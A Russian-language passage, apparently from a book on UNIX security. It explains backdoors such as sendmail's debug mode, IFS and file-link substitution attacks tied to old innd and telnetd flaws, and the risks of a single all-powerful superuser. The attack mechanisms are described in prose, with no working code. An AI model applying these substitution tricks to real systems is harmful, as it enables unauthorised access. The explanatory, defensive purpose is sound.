ΠΎΠ±Ρ€Π°Π±Π°Ρ‚Ρ‹Π²Π°Π΅Ρ‚ случайныС Π²Ρ…ΠΎΠ΄Π½Ρ‹Π΅ Π΄Π°Π½Π½Ρ‹Π΅, Ρ‚ΠΎ, ΠΎΡ‡Π΅Π²ΠΈΠ΄Π½ΠΎ, ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΠ΄ΠΎΠ±Ρ€Π°Ρ‚ΡŒ Ρ‚Π°ΠΊΠΈΠ΅ спСцифичСскиС Π²Ρ…ΠΎΠ΄Π½Ρ‹Π΅ Π΄Π°Π½Π½Ρ‹Π΅, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΡ€ΠΈΠ²Π΅Π΄ΡƒΡ‚ ΠΊ ΠΆΠ΅Π»Π°Π΅ΠΌΡ‹ΠΌ для Ρ…Π°ΠΊΠ΅Ρ€Π° Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π°ΠΌ, ΠΊΠ°ΠΊ ΡΠ»ΡƒΡ‡ΠΈΠ»ΠΎΡΡŒ с innd.

Π›ΡŽΠΊΠΎΠΌ ΠΈΠ»ΠΈ Β«Ρ‡Π΅Ρ€Π½Ρ‹ΠΌ Π²Ρ…ΠΎΠ΄ΠΎΠΌΒ» (backdoor) часто Π½Π°Π·Ρ‹Π²Π°ΡŽΡ‚ ΠΎΡΡ‚Π°Π²Π»Π΅Π½Π½ΡƒΡŽ Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠΎΠΌ Π½Π΅Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚ΠΈΡ€ΠΎΠ²Π°Π½Π½ΡƒΡŽ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ взаимодСйствия с систСмой (Ρ‡Π°Ρ‰Π΅ всСго – Π²Ρ…ΠΎΠ΄Π° Π² Π½Π΅Π΅), Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, извСстный Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΡƒ ΡƒΠ½ΠΈΠ²Π΅Ρ€ΡΠ°Π»ΡŒΠ½Ρ‹ΠΉ Β«ΠΏΠ°Ρ€ΠΎΠ»ΡŒΒ». Π›ΡŽΠΊΠΈ ΠΎΡΡ‚Π°Π²Π»ΡΡŽΡ‚ Π² ΠΊΠΎΠ½Π΅Ρ‡Π½Ρ‹Ρ… ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°Ρ… вслСдствиС ошибки, Π½Π΅ ΡƒΠ±Ρ€Π°Π² ΠΎΡ‚Π»Π°Π΄ΠΎΡ‡Π½Ρ‹ΠΉ ΠΊΠΎΠ΄, ΠΈΠ»ΠΈ вслСдствиС нСобходимости продолТСния ΠΎΡ‚Π»Π°Π΄ΠΊΠΈ ΡƒΠΆΠ΅ Π² Ρ€Π΅Π°Π»ΡŒΠ½ΠΎΠΉ систСмС ΠΈΠ·-Π·Π° Π΅Π΅ высокой слоТности, ΠΈΠ»ΠΈ ΠΆΠ΅ ΠΈΠ· корыстных интСрСсов. Π›ΡŽΠΊΠΈ – это Π»ΡŽΠ±ΠΈΠΌΡ‹ΠΉ ΠΏΡƒΡ‚ΡŒ Π² ΡƒΠ΄Π°Π»Π΅Π½Π½ΡƒΡŽ систСму Π½Π΅ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρƒ Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ², Π½ΠΎ ΠΈ Ρƒ Турналистов, ΠΈ рСТиссСров вмСстС с ΠΏΠΎΠ΄Π±ΠΎΡ€ΠΎΠΌ Β«Π³Π»Π°Π²Π½ΠΎΠ³ΠΎΒ» пароля ΠΏΠ΅Ρ€Π΅Π±ΠΎΡ€ΠΎΠΌ Π·Π° ΠΌΠΈΠ½ΡƒΡ‚Ρƒ Π΄ΠΎ Π²Π·Ρ€Ρ‹Π²Π°, Π½ΠΎ, Π² ΠΎΡ‚Π»ΠΈΡ‡ΠΈΠ΅ ΠΎΡ‚ послСднСго способа, люки Ρ€Π΅Π°Π»ΡŒΠ½ΠΎ ΡΡƒΡ‰Π΅ΡΡ‚Π²ΡƒΡŽΡ‚. ΠšΠ»Π°ΡΡΠΈΡ‡Π΅ΡΠΊΠΈΠΉ ΠΏΡ€ΠΈΠΌΠ΅Ρ€ люка – это, ΠΊΠΎΠ½Π΅Ρ‡Π½ΠΎ, ΠΎΡ‚Π»Π°Π΄ΠΎΡ‡Π½Ρ‹ΠΉ Ρ€Π΅ΠΆΠΈΠΌ Π² sendmail.

НаконСц, ΠΌΠ½ΠΎΠ³ΠΈΠ΅ особСнности UNIX, Ρ‚Π°ΠΊΠΈΠ΅ ΠΊΠ°ΠΊ асинхронноС Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ процСссов, Ρ€Π°Π·Π²ΠΈΡ‚Ρ‹Π΅ ΠΊΠΎΠΌΠ°Π½Π΄Π½Ρ‹ΠΉ язык ΠΈ файловая систСма, ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡŽΡ‚ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠ°ΠΌ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ ΠΌΠ΅Ρ…Π°Π½ΠΈΠ·ΠΌΡ‹ ΠΏΠΎΠ΄ΠΌΠ΅Π½Ρ‹ ΠΎΠ΄Π½ΠΎΠ³ΠΎ ΡΡƒΠ±ΡŠΠ΅ΠΊΡ‚Π° ΠΈΠ»ΠΈ ΠΎΠ±ΡŠΠ΅ΠΊΡ‚Π° Π΄Ρ€ΡƒΠ³ΠΈΠΌ. НапримСр, Π² рассмотрСнных Π²Ρ‹ΡˆΠ΅ ΠΏΡ€ΠΈΠΌΠ΅Ρ€Π°Ρ… часто ΠΏΡ€ΠΈΠΌΠ΅Π½ΡΠ»Π°ΡΡŒ Π·Π°ΠΌΠ΅Π½Π° ΠΈΠΌΠ΅Π½ΠΈ Ρ„Π°ΠΉΠ»Π°, ΠΈΠΌΠ΅Π½ΠΈ получатСля ΠΈ Ρ‚. ΠΏ. ΠΈΠΌΠ΅Π½Π΅ΠΌ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹. Аналогично ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½Π° ΠΏΠΎΠ΄ΠΌΠ΅Π½Π° ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹Ρ… ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Ρ…. Π’Π°ΠΊ, для Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… вСрсий UNIX сущСствуСт Π°Ρ‚Π°ΠΊΠ°, связанная с ΠΏΠΎΠ΄ΠΌΠ΅Π½ΠΎΠΉ IFS (internal field separator – символ раздСлитСля ΠΊΠΎΠΌΠ°Π½Π΄ ΠΈΠ»ΠΈ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΉ) Π½Π° символ Β«/Β». Π­Ρ‚ΠΎ ΠΏΡ€ΠΈΠ²ΠΎΠ΄ΠΈΡ‚ ΠΊ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰Π΅ΠΌΡƒ: ΠΊΠΎΠ³Π΄Π° ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° Π²Ρ‹Π·Ρ‹Π²Π°Π΅Ρ‚ /bin/ sh, вмСсто Π½Π΅Π³ΠΎ вызываСтся Ρ„Π°ΠΉΠ» bin с ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΎΠΌ sh Π² Ρ‚Π΅ΠΊΡƒΡ‰Π΅ΠΌ ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³Π΅. ΠŸΠΎΡ…ΠΎΠΆΠ°Ρ ситуация Π²ΠΎΠ·Π½ΠΈΠΊΠ°Π΅Ρ‚ ΠΏΡ€ΠΈ Π°Ρ‚Π°ΠΊΠ΅ Π½Π° telnetd. НаконСц, ΠΎΡ‡Π΅Π½ΡŒ популярным Π² UNIX Π²ΠΈΠ΄ΠΎΠΌ ΠΏΠΎΠ΄ΠΌΠ΅Π½Ρ‹ являСтся созданиС ссылки (link) Π½Π° ΠΊΡ€ΠΈΡ‚ΠΈΡ‡Π½Ρ‹ΠΉ Ρ„Π°ΠΉΠ». ПослС этого Ρ„Π°ΠΉΠ»-ссылка Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅Ρ‚ Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ ΠΏΡ€Π°Π²Π° доступа, ΠΈ Ρ‚Π΅ΠΌ самым осущСствляСтся нСсанкционированный доступ ΠΊ исходному Ρ„Π°ΠΉΠ»Ρƒ. Подобная ситуация с ΠΏΠΎΠ΄ΠΌΠ΅Π½ΠΎΠΉ Ρ„Π°ΠΉΠ»Π° Π²ΠΎΠ·Π½ΠΈΠΊΠ°Π΅Ρ‚, Ссли ΠΏΡƒΡ‚ΡŒ ΠΊ Π½Π΅ΠΌΡƒ ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½ Π½Π΅ ΠΊΠ°ΠΊ Π°Π±ΡΠΎΠ»ΡŽΡ‚Π½Ρ‹ΠΉ (/ bin/sh), Π° ΠΊΠ°ΠΊ ΠΎΡ‚Π½ΠΎΡΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹ΠΉ (../bin/sh ΠΈΠ»ΠΈ $(BIN)/sh). Вакая ситуация Ρ‚Π°ΠΊΠΆΠ΅ ΠΈΠΌΠ΅Π»Π° мСсто Π² рассмотрСнной уязвимости telnetd.

И послСднСС, ΠΎ Ρ‡Π΅ΠΌ ΡƒΠΆΠ΅ ΠΏΠΎΠ΄Ρ€ΠΎΠ±Π½ΠΎ Π³ΠΎΠ²ΠΎΡ€ΠΈΠ»ΠΎΡΡŒ Π²ΠΎ Π²Ρ‚ΠΎΡ€ΠΎΠΉ Π³Π»Π°Π²Π΅, β€“ нСльзя ΠΏΡ€ΠΈΡƒΠΌΠ΅Π½ΡŒΡˆΠ°Ρ‚ΡŒ Ρ€ΠΎΠ»ΡŒ Ρ‡Π΅Π»ΠΎΠ²Π΅ΠΊΠ° Π² обСспСчСнии бСзопасности любой систСмы (ΠΏΡ€ΠΎ Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΠΎΡΡ‚ΡŒ Π²Ρ‹Π±ΠΎΡ€Π° Π½Π°Π΄Π΅ΠΆΠ½Ρ‹Ρ… ΠΏΠ°Ρ€ΠΎΠ»Π΅ΠΉ ΡƒΠΏΠΎΠΌΠΈΠ½Π°Π»ΠΎΡΡŒ Ρ€Π°Π½Π΅Π΅). ΠΠ΅ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½ΠΎΠ΅ администрированиС – Ρ‚ΠΎΠΆΠ΅ ΠΎΡ‡Π΅Π½ΡŒ Π°ΠΊΡ‚ΡƒΠ°Π»ΡŒΠ½Π°Ρ ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠ°, Π° для UNIX ΠΎΠ½Π° особСнно остра, Ρ‚Π°ΠΊ ΠΊΠ°ΠΊ ΡΠ»ΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ администрирования UNIX-систСм Π΄Π°Π²Π½ΠΎ стала ΠΏΡ€ΠΈΡ‚Ρ‡Π΅ΠΉ Π²ΠΎ языцСх, ΠΈ часто ΠΈΠΌΠ΅Π½Π½ΠΎ Π½Π° это ΡΡΡ‹Π»Π°ΡŽΡ‚ΡΡ ΠΊΠΎΠ½ΠΊΡƒΡ€Π΅Π½Ρ‚Ρ‹. Но Π·Π° всС Π½Π°Π΄ΠΎ ΠΏΠ»Π°Ρ‚ΠΈΡ‚ΡŒ, Π° это – обратная сторона пСрСносимости ΠΈ гибкости UNIX.

Настройки Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠΉ, Ρ‚ΠΎΠΉ ΠΆΠ΅ sendmail, Π½Π°ΡΡ‚ΠΎΠ»ΡŒΠΊΠΎ слоТны, Ρ‡Ρ‚ΠΎ для поддСрТания работоспособности систСмы трСбуСтся ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹ΠΉ Ρ‡Π΅Π»ΠΎΠ²Π΅ΠΊ – систСмный администратор, Π½ΠΎ Π΄Π°ΠΆΠ΅ ΠΎΠ½, ΠΌΡ‹ ΡƒΠ²Π΅Ρ€Π΅Π½Ρ‹, Π½Π΅ всСгда Π·Π½Π°Π΅Ρ‚ ΠΎ всСх возмоТностях Ρ‚Π΅Ρ… ΠΈΠ»ΠΈ ΠΈΠ½Ρ‹Ρ… ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠΉ ΠΈ ΠΎ Ρ‚ΠΎΠΌ, ΠΊΠ°ΠΊ ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½ΠΎ ΠΈΡ… Π½Π°ΡΡ‚Ρ€ΠΎΠΈΡ‚ΡŒ. Π‘ΠΎΠ»Π΅Π΅ Ρ‚ΠΎΠ³ΠΎ, Ссли Π³ΠΎΠ²ΠΎΡ€ΠΈΡ‚ΡŒ ΠΎ слабости Ρ‡Π΅Π»ΠΎΠ²Π΅ΠΊΠ°, Π·Π°Ρ‰ΠΈΡ‰Π΅Π½Π½Ρ‹Π΅ систСмы ΠΎΠ±Ρ‹Ρ‡Π½ΠΎ ΠΎΡ‚ΠΊΠ°Π·Ρ‹Π²Π°ΡŽΡ‚ΡΡ ΠΈ Π΅Ρ‰Π΅ ΠΎΡ‚ ΠΎΠ΄Π½ΠΎΠΉ ΠΈΠ· основных ΠΈΠ΄Π΅ΠΉ UNIX – наличия ΡΡƒΠΏΠ΅Ρ€ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ, ΠΈΠΌΠ΅ΡŽΡ‰Π΅Π³ΠΎ доступ ΠΊΠΎ всСй ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ ΠΈ Π½ΠΈΠΊΠΎΠΌΡƒ Π½Π΅ ΠΏΠΎΠ΄ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒΠ½ΠΎΠ³ΠΎ. Π•Π³ΠΎ ΠΏΡ€Π°Π²Π° ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ распрСдСлСны срСди Π½Π΅ΡΠΊΠΎΠ»ΡŒΠΊΠΈΡ… людСй: администратора пСрсонала, администратора бСзопасности, администратора сСти ΠΈ Ρ‚. ΠΏ., Π° сам ΠΎΠ½ ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ ΡƒΠ΄Π°Π»Π΅Π½ ΠΈΠ· систСмы послС Π΅Π΅ инсталляции. Π’ Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ Π²Π΅Ρ€Π±ΠΎΠ²ΠΊΠ° ΠΎΠ΄Π½ΠΎΠ³ΠΎ ΠΈΠ· администраторов Π½Π΅ ΠΏΡ€ΠΈΠ²ΠΎΠ΄ΠΈΡ‚ ΠΊ Ρ‚Π°ΠΊΠΈΠΌ катастрофичСским послСдствиям, ΠΊΠ°ΠΊ Π²Π΅Ρ€Π±ΠΎΠ²ΠΊΠ° ΡΡƒΠΏΠ΅Ρ€ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ.